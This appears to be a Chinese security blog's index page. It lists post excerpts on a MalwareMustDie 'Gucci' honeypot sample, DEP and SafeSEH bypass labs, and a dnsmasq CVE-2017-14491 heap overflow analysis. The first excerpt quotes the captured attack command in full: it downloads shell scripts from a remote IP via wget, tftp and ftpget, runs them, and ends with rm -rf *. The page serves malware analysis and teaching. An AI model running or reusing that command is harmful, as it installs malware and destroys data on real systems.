• MalwareMustDie Gucci样本分析

    0x00 背景

    在ssh蜜罐上捕获到恶意样本,执行的命令如下:

    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://212.47.239.249/justyzoat.sh; chmod 777 justyzoat.sh; sh justyzoat.sh; tftp 212.47.239.249 -c get tutftp1.sh; chmod 777 tutftp1.sh; sh tutftp1.sh; tftp -r tutftp2.sh -g 212.47.239.249; chmod 777 tutftp2.sh; sh tutftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 212.47.239.249 tuftp1.sh tuftp1.sh; sh tuftp1.sh; rm -rf justyzoat.sh tutftp1.sh tutftp2.sh tuftp1.sh; rm -rf *
    

    Read on →

  • 0day安全DEP绕过实验(下)

    0x00 实验环境

    • 操作系统:xp sp3
    • 编译器:vs 2010
    • 编译选项:Release版本;开启DEP,关闭GS,SafeSEH,ASLR

    Read on →

  • 0day安全DEP绕过实验(上)

    0x00 实验环境

    • 操作系统:xp sp3
    • 编译器:vs 2010
    • 编译选项:Release版本;开启DEP,关闭GS,SafeSEH,ASLR

    Read on →

  • 0day安全safeSEH绕过实验

    0x00 实验环境

    • 操作系统:xp sp3
    • 编译器:vs 2010
    • 编译选项:Release版本;关闭优化,DEP,ASLR

    Read on →

  • CVE-2017-14491 dnsmasq 堆溢出分析

    0x00 问题背景

    谷歌安全团队对dnsmasq进行了测试并发现了多个漏洞,其中的CVE-2017-14491是一个堆溢出漏洞,存在RCE的风险。不过其在相关博客中只给出了PoC脚本测试步骤和相关的报错asan,需要我们自己分析过程中的调用流程,进一步有可能开发出RCE的exp脚本。

    Read on →